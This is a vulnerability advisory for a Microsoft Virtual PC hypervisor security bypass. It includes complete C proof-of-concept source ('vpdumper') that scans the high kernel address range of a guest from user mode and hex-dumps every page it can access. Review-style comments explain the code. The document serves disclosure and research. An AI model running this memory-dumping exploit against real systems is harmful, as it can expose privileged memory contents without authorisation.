=====================================================================================
Microsoft Virtual PC Hypervisor Virtual Machine Monitor Security Bypass Vulnerability
=====================================================================================
Vulnerable: Microsoft Windows Virtual PC 0
Microsoft Windows 7 XP Mode 0
Microsoft Virtual Server 2005 0
Microsoft Virtual PC 2007 SP1
Microsoft Virtual PC 2007 0
#include <windows.h>
#include <stdio.h>
#include <ctype.h>
/* Number of bytes shown on each row of the hex dump printed by print_data. */
#define ROWS 16
/* Scans pages from 0x80000000 upwards and dumps each one the process can read or write. */
void find_leaked_memory ( void );
/* Hex/ASCII dump helper; arguments are: address label for the first row, data, byte count. */
void print_data ( unsigned int , char * , unsigned int );
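/*
 * Entry point of the proof-of-concept: prints the tool banner and then runs
 * the address-space scan in find_leaked_memory().
 *
 * Returns 1 unconditionally. NOTE(review): a non-zero exit status normally
 * signals failure to the calling shell; it is left as the author wrote it
 * because anything driving this test may depend on the value.
 */
int main ( void )
{
    /* Banner; every line starts with a line break. */
    printf ( "\n*********** vpdumper.exe ***********" );
    printf ( "\nCreated by Nicolas A. Economou ( neconomou@corest.com )" );
    printf ( "\nCore Security Technologies, Buenos Aires, Argentina ( 2010 )\n" );

    /* Scan the high address range and print whatever is accessible. */
    printf ( "\nsearching leaked memory\n" );
    find_leaked_memory ();

    return ( 1 );
}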
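/*
 * Probe every 4 KB page from 0x80000000 up to (not including) 0xfffff000
 * and hex-dump each page this user-mode process can read or write.
 *
 * How to read the output: with the default 2 GB / 2 GB split of 32-bit
 * Windows the probed range is not accessible from user mode, so on an
 * unaffected guest the loop prints no pages. An "attributes:" line means
 * the page at that address was reachable from user mode.
 * NOTE(review): that reading only holds when user space ends at 2 GB. A
 * guest configured with a larger user address space, or a
 * large-address-aware 32-bit process on 64-bit Windows, legitimately owns
 * pages in this range; confirm the layout before treating output as a
 * finding.
 *
 * IsBadReadPtr / IsBadWritePtr test a page by touching it (IsBadWritePtr
 * writes to the probed byte) and are documented by Microsoft as obsolete;
 * they must not be reused as pointer validation in production code.
 *
 * The pointer-to-unsigned-int casts assume a 32-bit build.
 */
void find_leaked_memory ( void )
{
    char buffer [ 0x1000 ];   /* private copy of the page being dumped */
    char *base;
    int r, w;

    /* Walk the upper half of the 32-bit address space one page at a time. */
    for ( base = ( char * ) 0x80000000 ; base < ( char * ) 0xfffff000 ; base += 0x1000 )
    {
        /*
         * "Dark Area": this single page is skipped by the author.
         * NOTE(review): the page gives no reason for this address.
         */
        if ( ( unsigned int ) base == 0xe839c000 )
        {
            continue;
        }

        /* A one-byte probe is enough: base is page aligned. */
        r = ( IsBadReadPtr ( base , 1 ) == FALSE ) ? TRUE : FALSE;
        w = ( IsBadWritePtr ( base , 1 ) == FALSE ) ? TRUE : FALSE;

        /* Nothing to report for a page that is neither readable nor writable. */
        if ( r == FALSE && w == FALSE )
        {
            continue;
        }

        /* Copy the page first so the dump works on a stable snapshot. */
        memcpy ( buffer , base , 0x1000 );

        /* Page attributes, e.g. "attributes: RW". */
        printf ( "attributes: " );
        printf ( "%s" , ( r == TRUE ) ? "R":"" );
        printf ( "%s" , ( w == TRUE ) ? "W":"" );
        printf ( "\n" );

        /* Hex dump labelled with the original address. */
        print_data ( ( unsigned int ) base , buffer , 0x1000 );
    }
}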
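/*
 * Print bytes_a_imprimir bytes of buffer as a hex dump, ROWS bytes per line:
 *   "<address> | <hex bytes> | <printable characters>"
 *
 * direccion         address printed at the start of the first row; it is
 *                   advanced by ROWS per row and used only as a label.
 * buffer            data to dump; must hold at least bytes_a_imprimir bytes.
 * bytes_a_imprimir  number of bytes to print. A final short row is padded
 *                   so both column separators stay aligned.
 */
void print_data ( unsigned int direccion , char *buffer , unsigned int bytes_a_imprimir )
{
    unsigned int cont;   /* offset of the first byte of the current row */
    unsigned int i;

    /* One iteration per output row. */
    for ( cont = 0 ; cont < bytes_a_imprimir ; cont = cont + ROWS )
    {
        /* Row label, then advance it for the next row. */
        printf ( "%.8x | " , direccion );
        direccion = direccion + ROWS;

        /* Hex column. */
        for ( i = 0 ; i < ROWS ; i ++ )
        {
            if ( i < ( bytes_a_imprimir - cont ) )
            {
                printf ( "%.2x " , ( unsigned char ) buffer [ i + cont ] );
            }
            else
            {
                /* Pad with the width of one "%.2x " cell. */
                printf ( "   " );
            }
        }

        /* Separator between the two columns. */
        printf ( "| " );

        /* Character column: non-printable bytes are shown as '.'. */
        for ( i = 0 ; i < ROWS ; i ++ )
        {
            if ( i < ( bytes_a_imprimir - cont ) )
            {
                /* isgraph() is undefined for negative values, so go through unsigned char. */
                unsigned char c = ( unsigned char ) buffer [ i + cont ];

                printf ( "%c" , isgraph ( c ) ? c : '.' );
            }
            else
            {
                printf ( " " );
            }
        }

        /* End of row. */
        printf ( "\n" );
    }
}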